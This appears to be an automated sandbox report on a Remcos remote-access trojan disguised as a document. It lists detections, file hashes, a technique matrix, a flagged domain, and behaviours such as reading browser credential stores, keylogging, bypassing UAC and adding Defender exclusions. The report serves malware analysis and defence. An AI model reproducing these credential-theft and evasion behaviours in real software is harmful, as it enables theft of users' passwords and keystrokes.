                Source: Yara matchFile source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.37a6638.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.TkdxROLUOVpK.exe.3c623e0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.TkdxROLUOVpK.exe.3be99c0.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.TkdxROLUOVpK.exe.3b2f1a0.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000009.00000002.4510842027.000000000504B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.2107662526.00000000054E7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2092193357.00000000037A6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.2131352258.0000000003AC6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: #U8f6e#U6905-#U89c4#U683c.docx.pif.exe PID: 3628, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 4304, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: TkdxROLUOVpK.exe PID: 2892, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 5456, type: MEMORYSTR
                Source: Yara matchFile source: C:\ProgramData\gaban\logs.dat, type: DROPPED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data15_2_0040BA12
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\15_2_0040BB30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: \key3.db15_2_0040BB30

                Remote Access Functionality

                barindex
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-5MRRQ3Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-5MRRQ3Jump to behavior
                Source: Yara matchFile source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.37a6638.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 15.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 15.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.TkdxROLUOVpK.exe.3be99c0.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.381f058.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.TkdxROLUOVpK.exe.3c623e0.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.381f058.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.37a6638.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.TkdxROLUOVpK.exe.3c623e0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.TkdxROLUOVpK.exe.3be99c0.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.TkdxROLUOVpK.exe.3b2f1a0.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000009.00000002.4510842027.000000000504B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.2107662526.00000000054E7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2092193357.00000000037A6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.2131352258.0000000003AC6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: #U8f6e#U6905-#U89c4#U683c.docx.pif.exe PID: 3628, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 4304, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: TkdxROLUOVpK.exe PID: 2892, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 5456, type: MEMORYSTR
                Source: Yara matchFile source: C:\ProgramData\gaban\logs.dat, type: DROPPED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: cmd.exe15_2_0040569A
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                Native API
                1
                DLL Side-Loading
                1
                DLL Side-Loading
                11
                Disable or Modify Tools
                1
                OS Credential Dumping
                2
                System Time Discovery
                Remote Services11
                Archive Collected Data
                11
                Ingress Tool Transfer
                Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault Accounts1
                Command and Scripting Interpreter
                1
                Windows Service
                1
                Bypass User Account Control
                1
                Deobfuscate/Decode Files or Information
                211
                Input Capture
                1
                Account Discovery
                Remote Desktop Protocol211
                Input Capture
                2
                Encrypted Channel
                Exfiltration Over Bluetooth1
                Defacement
                Email AddressesDNS ServerDomain Accounts1
                Scheduled Task/Job
                1
                Scheduled Task/Job
                1
                Access Token Manipulation
                14
                Obfuscated Files or Information
                2
                Credentials In Files
                1
                System Service Discovery
                SMB/Windows Admin Shares3
                Clipboard Data
                1
                Remote Access Software
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal Accounts2
                Service Execution
                Login Hook1
                Windows Service
                12
                Software Packing
                NTDS3
                File and Directory Discovery
                Distributed Component Object ModelInput Capture1
                Non-Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script322
                Process Injection
                1
                DLL Side-Loading
                LSA Secrets33
                System Information Discovery
                SSHKeylogging11
                Application Layer Protocol
                Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts1
                Scheduled Task/Job
                1
                Bypass User Account Control
                Cached Domain Credentials121
                Security Software Discovery
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
                Masquerading
                DCSync131
                Virtualization/Sandbox Evasion
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job131
                Virtualization/Sandbox Evasion
                Proc Filesystem3
                Process Discovery
                Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                Access Token Manipulation
                /etc/passwd and /etc/shadow1
                Application Window Discovery
                Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron322
                Process Injection
                Network Sniffing1
                System Owner/User Discovery
                Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1466661 Sample: #U8f6e#U6905-#U89c4#U683c.d... Startdate: 03/07/2024 Architecture: WINDOWS Score: 100 50 www.vipguyclassproject2024.space 2->50 52 Found malware configuration 2->52 54 Malicious sample detected (through community Yara rule) 2->54 56 Antivirus detection for URL or domain 2->56 58 13 other signatures 2->58 8 #U8f6e#U6905-#U89c4#U683c.docx.pif.exe 7 2->8         started        12 TkdxROLUOVpK.exe 5 2->12         started        signatures3 process4 file5 40 C:\Users\user\AppData\...\TkdxROLUOVpK.exe, PE32 8->40 dropped 42 C:\Users\...\TkdxROLUOVpK.exe:Zone.Identifier, ASCII 8->42 dropped 44 C:\Users\user\AppData\Local\...\tmpBE91.tmp, XML 8->44 dropped 46 #U8f6e#U6905-#U89c...3c.docx.pif.exe.log, ASCII 8->46 dropped 60 Uses schtasks.exe or at.exe to add and modify task schedules 8->60 62 Writes to foreign memory regions 8->62 64 Allocates memory in foreign processes 8->64 66 Adds a directory exclusion to Windows Defender 8->66 14 vbc.exe 3 2 8->14         started        18 powershell.exe 23 8->18         started        20 powershell.exe 23 8->20         started        22 schtasks.exe 1 8->22         started        68 Multi AV Scanner detection for dropped file 12->68 70 Machine Learning detection for dropped file 12->70 72 Injects a PE file into a foreign processes 12->72 24 vbc.exe 12->24         started        26 schtasks.exe 1 12->26         started        28 vbc.exe 12->28         started        signatures6 process7 file8 48 C:\ProgramData\gaban\logs.dat, data 14->48 dropped 74 Contains functionality to bypass UAC (CMSTPLUA) 14->74 76 Detected Remcos RAT 14->76 78 Contains functionalty to change the wallpaper 14->78 82 6 other signatures 14->82 80 Loading BitLocker PowerShell Module 18->80 30 WmiPrvSE.exe 18->30         started        32 conhost.exe 18->32         started        34 conhost.exe 20->34         started        36 conhost.exe 22->36         started        38 conhost.exe 26->38         started        signatures9 process10

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                #U8f6e#U6905-#U89c4#U683c.docx.pif.exe66%ReversingLabsByteCode-MSIL.Backdoor.Remcos
                #U8f6e#U6905-#U89c4#U683c.docx.pif.exe60%VirustotalBrowse
                #U8f6e#U6905-#U89c4#U683c.docx.pif.exe100%Joe Sandbox ML
                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe66%ReversingLabsByteCode-MSIL.Backdoor.Remcos
                C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe60%VirustotalBrowse
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                http://geoplugin.net/json.gp0%URL Reputationsafe
                http://geoplugin.net/json.gp0%URL Reputationsafe
                http://geoplugin.net/json.gp/C0%URL Reputationsafe
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                www.vipguyclassproject2024.space100%Avira URL Cloudmalware
                NameIPActiveMaliciousAntivirus DetectionReputation
                www.vipguyclassproject2024.space
                unknown
                unknowntrue
                  unknown
                  NameMaliciousAntivirus DetectionReputation
                  www.vipguyclassproject2024.spacetrue
                  • Avira URL Cloud: malware
                  unknown
                  NameSourceMaliciousAntivirus DetectionReputation
                  http://geoplugin.net/json.gpvbc.exefalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  unknown
                  http://geoplugin.net/json.gp/C#U8f6e#U6905-#U89c4#U683c.docx.pif.exe, 00000000.00000002.2092193357.00000000037A6000.00000004.00000800.00020000.00000000.sdmp, TkdxROLUOVpK.exe, 0000000A.00000002.2131352258.0000000003AC6000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name#U8f6e#U6905-#U89c4#U683c.docx.pif.exe, 00000000.00000002.2091740507.00000000028D1000.00000004.00000800.00020000.00000000.sdmp, TkdxROLUOVpK.exe, 0000000A.00000002.2127357772.0000000002A61000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  No contacted IP infos
                  Joe Sandbox version:40.0.0 Tourmaline
                  Analysis ID:1466661
                  Start date and time:2024-07-03 08:55:30 +02:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 10m 28s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Number of analysed new started processes analysed:19
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:#U8f6e#U6905-#U89c4#U683c.docx.pif.exe
                  renamed because original name is a hash value
                  Original Sample Name:-.docx.pif.exe
                  Detection:MAL
                  Classification:mal100.rans.troj.spyw.expl.evad.winEXE@21/16@51/0
                  EGA Information:
                  • Successful, ratio: 75%
                  HCA Information:
                  • Successful, ratio: 99%
                  • Number of executed functions: 240
                  • Number of non-executed functions: 232
                  Cookbook Comments:
                  • Found application associated with file extension: .exe
                  • Override analysis time to 240000 for current running targets taking high CPU consumption
                  • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                  • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                  • Execution Graph export aborted for target vbc.exe, PID 4304 because there are no executed function
                  • Not all processes where analyzed, report is missing behavior information
                  • Report size exceeded maximum capacity and may have missing behavior information.
                  • Report size getting too big, too many NtCreateKey calls found.
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  TimeTypeDescription
                  02:56:21API Interceptor1x Sleep call for process: #U8f6e#U6905-#U89c4#U683c.docx.pif.exe modified
                  02:56:23API Interceptor28x Sleep call for process: powershell.exe modified
                  02:56:26API Interceptor1x Sleep call for process: TkdxROLUOVpK.exe modified
                  02:56:55API Interceptor2979931x Sleep call for process: vbc.exe modified
                  08:56:23Task SchedulerRun new task: TkdxROLUOVpK path: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe
                  No context
                  No context
                  No context
                  No context
                  No context
                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):144
                  Entropy (8bit):3.3708727686148316
                  Encrypted:false
                  SSDEEP:3:rhlKlVElPQlx2wlDl5JWRal2Jl+7R0DAlBG45klovDl6v:6lVMol/b5YcIeeDAlOWAv
                  MD5:6C70860F5DB38DF502EF1D0AA62559A6
                  SHA1:ABA23D81D8BF936AC89B703CD6B1F25625C2FCCD
                  SHA-256:F04E7F59874D0A74B81EC11D6DDBACFF06AA7383AB80110AF57E3E219FDFE17A
                  SHA-512:C816FC465C0D4433126A37BEC16AF8E0860C4626AED0BCD86A2818AA7A3200A973541F0E9BB9052B9C20EEB1F30571614FDFA200EB1157F87FB0F52B5CDC94A2
                  Malicious:true
                  Yara Hits:
                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\gaban\logs.dat, Author: Joe Security
                  Preview:....[.2.0.2.4./.0.7./.0.3. .0.2.:.5.6.:.2.3. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....
                  Process:C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe
                  File Type:ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):1216
                  Entropy (8bit):5.34331486778365
                  Encrypted:false
                  SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                  MD5:1330C80CAAC9A0FB172F202485E9B1E8
                  SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                  SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                  SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                  Malicious:true
                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                  Process:C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe
                  File Type:ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):1216
                  Entropy (8bit):5.34331486778365
                  Encrypted:false
                  SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                  MD5:1330C80CAAC9A0FB172F202485E9B1E8
                  SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                  SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                  SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                  Malicious:false
                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  File Type:data
                  Category:modified
                  Size (bytes):2232
                  Entropy (8bit):5.379401388151058
                  Encrypted:false
                  SSDEEP:48:fWSU4y4RYdmloUeW+gZ9tK8NPZHUxL7u1iMugeC/ZPUyus:fLHyIYMqLgZ2KRHWLOug8s
                  MD5:CAA584A0F6458559FD313866A206386D
                  SHA1:F334EEFC6EB6210523FF581A3E2C776E4CA36ECC
                  SHA-256:850A137C3C31262C2BCDE7248ECB9FD02AC0C5DE6EB18D0ACCEA871F7709002D
                  SHA-512:8B08AAE77F6A543F43B066628364A57C107B6D81725A1D0B85078B2F5C3CD4E0929528178A4322C02669FE3397B692326F6598E3A18D59577A96EE5C967668A8
                  Malicious:false
                  Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<...............i..VdqF...|...........System.Configuration<................t.,.lG....M...........System.Management...4.................%...K... ...........System.Xml..@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  File Type:ASCII text, with no line terminators
                  Category:dropped
                  Size (bytes):60
                  Entropy (8bit):4.038920595031593
                  Encrypted:false
                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                  Malicious:false
                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  File Type:ASCII text, with no line terminators
                  Category:dropped
                  Size (bytes):60
                  Entropy (8bit):4.038920595031593
                  Encrypted:false
                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                  Malicious:false
                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  File Type:ASCII text, with no line terminators
                  Category:dropped
                  Size (bytes):60
                  Entropy (8bit):4.038920595031593
                  Encrypted:false
                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                  Malicious:false
                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  File Type:ASCII text, with no line terminators
                  Category:dropped
                  Size (bytes):60
                  Entropy (8bit):4.038920595031593
                  Encrypted:false
                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                  Malicious:false
                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  File Type:ASCII text, with no line terminators
                  Category:dropped
                  Size (bytes):60
                  Entropy (8bit):4.038920595031593
                  Encrypted:false
                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                  Malicious:false
                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  File Type:ASCII text, with no line terminators
                  Category:dropped
                  Size (bytes):60
                  Entropy (8bit):4.038920595031593
                  Encrypted:false
                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                  Malicious:false
                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  File Type:ASCII text, with no line terminators
                  Category:dropped
                  Size (bytes):60
                  Entropy (8bit):4.038920595031593
                  Encrypted:false
                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                  Malicious:false
                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  File Type:ASCII text, with no line terminators
                  Category:dropped
                  Size (bytes):60
                  Entropy (8bit):4.038920595031593
                  Encrypted:false
                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                  Malicious:false
                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                  Process:C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe
                  File Type:XML 1.0 document, ASCII text
                  Category:dropped
                  Size (bytes):1585
                  Entropy (8bit):5.111138330597854
                  Encrypted:false
                  SSDEEP:24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtJVxvn:cgergYrFdOFzOzN33ODOiDdKrsuTNv
                  MD5:CD4C848977FDC9A63F12CBAADCE502CE
                  SHA1:B3F73B7790638E59E1FAA58FE98ABE5C2CF20CFE
                  SHA-256:71309762BD0BA5A91AC3919C010C5846741BA249FC3ADE2A0463DDEB8DCA9972
                  SHA-512:E8AB87D419864C76DD8A15ED6997200DE661BEBF64ADBE195B0427D8A54E26A0A39E3647990997A605CF301D1191949EDF6CB5EF7A803A25BF4B7170612DDF79
                  Malicious:true
